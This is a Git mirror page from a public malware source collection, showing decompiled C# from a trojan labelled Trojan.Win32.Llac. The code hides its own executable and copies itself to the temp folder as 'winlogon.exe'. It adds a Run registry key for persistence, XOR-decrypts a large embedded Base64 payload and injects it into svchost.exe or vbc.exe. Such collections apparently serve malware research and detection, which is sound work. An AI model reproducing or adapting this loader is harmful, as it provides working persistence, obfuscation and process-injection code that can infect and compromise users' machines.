ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 18:06:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aagm-a1de981948b7415a4407eaa794cf1d79cc909c19ce8bb77b92ae1d70972c7684/BizlpPEBuNKhDbh.cs

97 lines
1.1 MiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: BizlpPEBuNKhDbh
// Assembly: Humanities Brochure, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 52299A9A-4AA4-4108-B5D3-F7828126CA81
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aagm-a1de981948b7415a4407eaa794cf1d79cc909c19ce8bb77b92ae1d70972c7684.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.IO;
using System.Text;
using System.Windows.Forms;
[StandardModule]
internal sealed class BizlpPEBuNKhDbh
{
[STAThread]
public static void Main()
{
nEHKCapiSBDXzFS nEhkCapiSbdXzFs = new nEHKCapiSBDXzFS();
string s = "0d4inYeLmKmGgb6gfVG6nDyynYSLmKmCwb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66JISynYqUIqeCNbdtoxa70EmTyezi64ny89HH8M/XvOfT8+rk7Ing5J7S98Ca9eqS2cvYuMTt5duOj6OwuISynYSLmKk1k7l7cd3TFHfB9Ax468AKm9LEClzJ9Qzg9Ofja9rrCb6ggq66nISynYSLmKmCgb6ggq66nISyndTOmKnOgL2gpbIN0YSynYSLmKmCYb6vg6W7moSy7YKLmLmCgb6ggq42j4SynZSLmKkCh76ggu66nJSynYSbmKmGgb6gg666nICynYSLmKmCgb6ngq6qnISjA4KLmqmCgb6gkq66jISynYSbmKmSgb6ggq66jISynYSLmKmCgb6gJt28nKyynYSLaK+CubCggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISan4SLuKmCgb6wgq7WnYSynYSLmKmCgb6ggq66nISynYSLmKmCgb6grNrf5PCynYTv/q+Cga6ggq7KmoSyjYSLmKmCgb6ggq66nISyvYSL+Ifm4MrBgq66COaynYQLnqmCgb6ggq66nISynYSLmKmCgb6ggu66nESc7/f5+6mCgYaugq66bIKynZSLmKkCh76ggq66nISynYSLmKnCgb7g7nTh1pSynYSLmKmCgb6gguPpysbk0LK7tu3Ozb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq6
string Left = "T";
if (Operators.CompareString("T", "T", false) == 0)
File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
if (Operators.CompareString(Left, "T", false) == 0)
{
try
{
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, Path.GetTempPath() + "winlogon.exe");
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("winlogon.exe", (object) ("\"" + Path.GetTempPath() + "winlogon.exe\""), RegistryValueKind.String);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
byte[] yopsrcqtdqlvwypcca = BizlpPEBuNKhDbh.mJhZVhxNiWfDxbd(Convert.FromBase64String(s), "TLzULCPaJIvhJfr");
VBMath.Randomize();
Encoding.GetEncoding(1252).GetBytes("0d4inYeLmKmGgb6gfVG6nDyynYSLmKmCwb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66JISynYqUIqeCNbdtoxa70EmTyezi64ny89HH8M/XvOfT8+rk7Ing5J7S98Ca9eqS2cvYuMTt5duOj6OwuISynYSLmKk1k7l7cd3TFHfB9Ax468AKm9LEClzJ9Qzg9Ofja9rrCb6ggq66nISynYSLmKmCgb6ggq66nISyndTOmKnOgL2gpbIN0YSynYSLmKmCYb6vg6W7moSy7YKLmLmCgb6ggq42j4SynZSLmKkCh76ggu66nJSynYSbmKmGgb6gg666nICynYSLmKmCgb6ngq6qnISjA4KLmqmCgb6gkq66jISynYSbmKmSgb6ggq66jISynYSLmKmCgb6gJt28nKyynYSLaK+CubCggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISan4SLuKmCgb6wgq7WnYSynYSLmKmCgb6ggq66nISynYSLmKmCgb6grNrf5PCynYTv/q+Cga6ggq7KmoSyjYSLmKmCgb6ggq66nISyvYSL+Ifm4MrBgq66COaynYQLnqmCgb6ggq66nISynYSLmKmCgb6ggu66nESc7/f5+6mCgYaugq66bIKynZSLmKkCh76ggq66nISynYSLmKnCgb7g7nTh1pSynYSLmKmCgb6gguPpysbk0LK7tu3Ozb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb
switch (BizlpPEBuNKhDbh.os.KEVFbLWcYjBPXYi())
{
case false:
try
{
nEhkCapiSbdXzFs.PxLkkMUhJcIgxYx(yopsrcqtdqlvwypcca, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\system32\\svchost.exe");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
ProjectData.EndApp();
break;
case true:
try
{
nEhkCapiSbdXzFs.PxLkkMUhJcIgxYx(yopsrcqtdqlvwypcca, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
ProjectData.EndApp();
break;
}
}
public static byte[] mJhZVhxNiWfDxbd(byte[] message, string password)
{
byte[] bytes = Encoding.Default.GetBytes(password);
int num1 = (int) message[checked (message.Length - 1)] ^ 112;
byte[] arySrc = new byte[checked (message.Length + 1)];
int num2 = checked (message.Length - 1);
int index1 = 0;
while (index1 <= num2)
{
int index2;
arySrc[index1] = checked ((byte) ((int) message[index1] ^ num1 ^ (int) bytes[index2]));
if (index2 == checked (password.Length - 1))
index2 = 0;
else
checked { ++index2; }
checked { ++index1; }
}
return (byte[]) Utils.CopyArray((Array) arySrc, (Array) new byte[checked (message.Length - 2 + 1)]);
}
public class os
{
public static bool KEVFbLWcYjBPXYi() => Operators.CompareString(Environment.GetEnvironmentVariable("ProgramW6432"), "", false) != 0;
}
}
Reference in New Issue Copy Permalink